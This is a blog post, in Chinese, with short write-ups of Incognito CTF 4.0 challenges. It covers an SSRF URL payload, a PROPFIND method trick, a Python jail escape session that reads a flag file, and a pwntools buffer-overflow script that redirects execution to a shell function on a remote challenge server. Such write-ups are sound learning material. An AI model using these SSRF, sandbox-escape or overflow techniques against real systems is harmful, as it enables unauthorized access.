<!DOCTYPE html>
<html>
    <head>
        







<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />


    <link rel="shortcut icon" href="/images/favicon-16x16.png" />


<link rel="preconnect" href="https://fonts.googleapis.com" />
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />
<link
    href="https://fonts.googleapis.com/css2?family=PT+Serif:ital,wght@0,400;0,700;1,400;1,700&display=swap"
    rel="stylesheet"
/>
<link
    href="https://cdn.jsdelivr.net/npm/@fontsource/cascadia-code@4.2.1/index.min.css"
    rel="stylesheet"
/>


<link rel="stylesheet" href="/styles/main.css">


    
<link rel="stylesheet" href="/styles/post.css">



<title>Incognito CTF 4.0 - Try &amp; Err</title>

    <meta name="generator" content="Hexo 7.3.0"><link rel="alternate" href="/atom.xml" title="Try & Err" type="application/atom+xml">
</head>
    <body>
        <header>
    <h1>Try &amp; Err</h1>
    <nav>
        <ul>
            <li><a href="/">Home</a></li>
            
                
                    <li>
                        <a href="/tags"
                            ><span>Tags</span></a
                        >
                    </li>
                
                    <li>
                        <a href="/categories"
                            ><span>Categories</span></a
                        >
                    </li>
                
                    <li>
                        <a href="/archives"
                            ><span>Archives</span></a
                        >
                    </li>
                
            
        </ul>
    </nav>
</header>

        <main>
    <header>
        <h1>
            
                Incognito CTF 4.0
            
        </h1>
        <div>
            <time>2023-02-18</time>
            <div class="post-categories">
                
                    <span class="category-tree">
                        
                            <span class="separator">/</span>
                            <a href="/categories/Competition/">Competition</a>
                        
                    </span>
                
            </div>
            <div class="post-tags">
                
                    <span class="tag">
                        <span class="separator">#</span>
                        <a href="/tags/CTF/">CTF</a>
                    </span>
                
                    <span class="tag">
                        <span class="separator">#</span>
                        <a href="/tags/Python/">Python</a>
                    </span>
                
            </div>
        </div>
    </header>
    <h2 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h2><h3 id="Get-flag-1"><a href="#Get-flag-1" class="headerlink" title="Get flag 1"></a>Get flag 1</h3><p>SSRF <code>?url=http://0.0.0.0:9001/flag.txt</code></p>
<h3 id="Low-on-options"><a href="#Low-on-options" class="headerlink" title="Low on options"></a>Low on options</h3><p>根據題目提示用OPTIONS request得到<code>As I said, I am low on options...</code>。 <del>一句廢話</del><br><img src="/2023/02/18/incognito-4/loo-options.png"><br>索性把所有method全部試一次，PROPFIND request拿到flag。<br><img src="/2023/02/18/incognito-4/loo-propfind.png"></p>
<h2 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h2><h3 id="Ancient"><a href="#Ancient" class="headerlink" title="Ancient"></a>Ancient</h3><p>拿到一個缺header的png檔，將header補上後得到有象形文字的圖片，以圖搜圖查到是十三世紀的一種記數方式，用<a target="_blank" rel="noopener" href="https://www.dcode.fr/cistercian-numbers">此網站</a>轉成數字對照Ascii table便可拿到flag。<br><img src="/2023/02/18/incognito-4/challenge.png"></p>
<h2 id="Pyjail"><a href="#Pyjail" class="headerlink" title="Pyjail"></a>Pyjail</h2><h3 id="The-only-jail"><a href="#The-only-jail" class="headerlink" title="The only jail"></a>The only jail</h3><p>nc進去發現是一個偽裝過的Python環境，有過濾一些像斜線、反斜線、大括號等字元，用os的path join便可湊出路徑用讀取flag。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">Welcome to the IIITL Jail! Escape <span class="keyword">if</span> you can</span><br><span class="line">jail&gt; <span class="keyword">import</span> os</span><br><span class="line">jail&gt; <span class="built_in">print</span>(os.listdir())     </span><br><span class="line">[<span class="string">&#x27;opt&#x27;</span>, <span class="string">&#x27;srv&#x27;</span>, <span class="string">&#x27;tmp&#x27;</span>, <span class="string">&#x27;lib&#x27;</span>, <span class="string">&#x27;bin&#x27;</span>, <span class="string">&#x27;media&#x27;</span>, <span class="string">&#x27;lib64&#x27;</span>, <span class="string">&#x27;dev&#x27;</span>, <span class="string">&#x27;sys&#x27;</span>, <span class="string">&#x27;home&#x27;</span>, <span class="string">&#x27;libx32&#x27;</span>, <span class="string">&#x27;root&#x27;</span>, <span class="string">&#x27;var&#x27;</span>, <span class="string">&#x27;run&#x27;</span>, <span class="string">&#x27;etc&#x27;</span>, <span class="string">&#x27;sbin&#x27;</span>, <span class="string">&#x27;lib32&#x27;</span>, <span class="string">&#x27;usr&#x27;</span>, <span class="string">&#x27;boot&#x27;</span>, <span class="string">&#x27;mnt&#x27;</span>, <span class="string">&#x27;proc&#x27;</span>, <span class="string">&#x27;.dockerenv&#x27;</span>, <span class="string">&#x27;start.sh&#x27;</span>]</span><br><span class="line">jail&gt; <span class="built_in">print</span>(os.listdir(<span class="string">&quot;home&quot;</span>))</span><br><span class="line">[<span class="string">&#x27;ctf&#x27;</span>]</span><br><span class="line">jail&gt; path = os.path.join(<span class="string">&quot;home&quot;</span>, <span class="string">&quot;ctf&quot;</span>)</span><br><span class="line">jail&gt; <span class="built_in">print</span>(os.listdir(path))</span><br><span class="line">[<span class="string">&#x27;.bash_logout&#x27;</span>, <span class="string">&#x27;.bashrc&#x27;</span>, <span class="string">&#x27;.profile&#x27;</span>, <span class="string">&#x27;flag.txt&#x27;</span>, <span class="string">&#x27;jail.py&#x27;</span>]</span><br><span class="line">jail&gt; path = os.path.join(path, <span class="string">&quot;flag.txt&quot;</span>)</span><br><span class="line">jail&gt; flag = <span class="built_in">open</span>(path)</span><br><span class="line">jail&gt; <span class="built_in">print</span>(flag.read())</span><br><span class="line">ictf&#123;ff8ab219-a90b-44f8-<span class="number">9273</span>-ccc13766f2eb&#125;</span><br><span class="line">jail&gt; </span><br></pre></td></tr></table></figure>

<h2 id="Rev"><a href="#Rev" class="headerlink" title="Rev"></a>Rev</h2><h3 id="Meow"><a href="#Meow" class="headerlink" title="Meow"></a>Meow</h3><p>flag藏在.rodata</p>
<h2 id="Pwn"><a href="#Pwn" class="headerlink" title="Pwn"></a>Pwn</h2><h3 id="Baby-Flow"><a href="#Baby-Flow" class="headerlink" title="Baby Flow"></a>Baby Flow</h3><p>checksec什麼都沒開，BOF把return address置換成get_shell的即可。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment">#conn = process(&#x27;./babyFlow&#x27;)</span></span><br><span class="line">conn = remote(<span class="string">&#x27;143.198.219.171&#x27;</span>, <span class="number">5000</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">b&#x27;A&#x27;</span>*<span class="number">20</span> + p32(<span class="number">0x80491fc</span>)</span><br><span class="line"></span><br><span class="line">conn.recvuntil(<span class="string">&#x27;can you pass me?\n&#x27;</span>)</span><br><span class="line"></span><br><span class="line">conn.sendline(payload)</span><br><span class="line"></span><br><span class="line">conn.interactive()</span><br></pre></td></tr></table></figure>

    <div class="gallery">
        
    </div>
</main>

        
    <nav class="pagination">
        <span class="prev">
            
                <a href="/2023/03/31/rcnn/">
                    [Summary] R-CNN
                </a>
            
        </span>
        <span class="next">
            
                <a href="/2023/02/09/dns-sinkhole/" >
                    DNS sinkhole
                </a>
            
        </span>
    </nav>


        <footer>
    <p>&copy; Pierre</p>
    <p>
        Powered by <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a>,
        <a target="_blank" rel="noopener" href="https://github.com/sunnybyeon/hexo-theme-dashed">Theme</a> by
        <a target="_blank" rel="noopener" href="https://github.com/sunnybyeon">sunnybyeon</a>
    </p>
    
</footer>

    </body>
</html>
